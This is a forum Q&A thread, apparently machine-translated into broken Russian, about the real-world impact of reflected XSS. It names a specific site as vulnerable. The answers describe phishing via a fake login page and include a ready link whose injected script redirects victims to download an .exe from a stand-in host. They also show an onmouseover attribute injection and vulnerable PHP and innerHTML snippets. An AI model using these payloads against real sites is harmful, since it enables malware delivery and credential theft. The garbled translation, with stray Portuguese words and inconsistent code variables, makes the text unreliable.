Как привести к повреждению сайт с помощью XSS/SQL injection?
я Не типа хакер, но я знаю некоторые приемы. Я готовлю безопасности, и я был действительно заботливый по отношению к этому вопросу. Каждый раз, когда injeto сценарий, является alert()
, ничего опасного для узла (например). Я не веб-сайт, не будет пересылать файлы cookie. Какой это большой риск отказа XSS на сайте без DB/система входа в систему? У меня есть сайт здесь (http://www.verinha.de/commentary_english.htm), что я нашел mechendo в интернете. Да, это ошибка потенциал, но, как сайт не должен войти, и я не знаю, что black hat могу сделать. То, что "хакеры/крекеры" в самом деле поступите?
PS: чтобы испытать, что давала, я написал <script>window.location = "https://www.google.com";</script>
. Меня направили в Google, и я вернулся к странице. Ничего не произошло.
2 answers
" Не существует, как правильно исследовать это. В основном вам нужно понять, кто обращается к сайту, и какие в центре внимания пользователей и часто не просто только использовать технику, например:
Предположим, что пользователи сайта имеют учетной записи на Сайте GLOB. Вы можете создать перенаправление или iframe на страницу, false Сайта GLOB с формой, и скопировать эти данные. Как пользователь ввел самостоятельно на Сайте, что есть проблема XSS он не будет считаете, что это не обманули. Другой пример можно было бы включать переадресацию .exe с целями атаки на компьютер пользователя. Это часто видели с страницы банк или виртуальные кошельки.
В примере в вопросе XSS не стойких, то есть он не получает сохраняется в пределах страницы, возможно, и не существует в базе данных. В этом случае метод должен быть адаптирован, является общим пройти скрипт через GET, когда проблема также использует некоторые поля бланк.
<?php
$name = $_GET['nome'];
echo "Bem vindo $nome<br>";
?>
Это пример очень похож на сайте упоминается, разница в том, что информация передается через GET в PHP, а не через Командную строку JavaScript. В этом случае достаточно будет отправить пользователям ссылку в качестве
http://sitexpto.com.br/?nome=<script>location.href='http://link.para/arquivo.exe';</script>
Вариант этой техники был достаточно широко используется в то время Orkut, Google уже использовала login "Com conta Google"
", по умолчанию, однако, существует дополнительный параметр с именем redirect
, многих отправляли в этот url-адрес с перенаправление в файл .exe
и página falsa de login
. Я знаю, что проблема не была связана с XSS, но я думаю, стоит упомянуть.
Сайте http://www.verinha.de
, действительно, есть проблема XSS, но, анализируя исходный код, можно видеть, что результат не хранится нигде, и, что не может сообщить значение через url-адрес. Таким образом, в целом, не существует приложения, в этом случае, по крайней мере, не с помощью только этого метода.
, Надеюсь, дополняется в чем-то.
Бы, что думать о чем-то так: Скажем, что бы текстовое поле, чтобы ввести что-то, например, имя пользователя:
User Name : <input ... value="Nome">
Теперь, вероятно, будет введен так:"onmouseover="событие
<input ... value=" "onmouseover="evento ">
Или что-то вроде: У нас есть текстовое поле, тип браузера, если digitarmos такую вещь, может появиться "Не найдено ни одного результата для [искали слово]" И если digitarmos: Код, и в браузере или на другом сайте вы не найдете ничего, если не имеет никакой защиты, может запустить скрипт. Предположим, что это код HTML:
<div>Não foi encntrado nenhum resultado para <script>alert("script")</script></div>
Пример 2:
<script type="text/javascript">
function Pesquise(){
/*Script do navegador ou parte de pesquisa de um site*/
document.getElementById("Result").innerHTML = "Não foi encontrado nenhum resultado para " + document.getElementById("CaixaPesquisa").value;
}
</script>
<input id="CaixaPesquisa" type="text" value="Código aqui"/><input type="submit" value="Pesquisar" onclick="Pesquise();"/>
<div id="Result">
</div>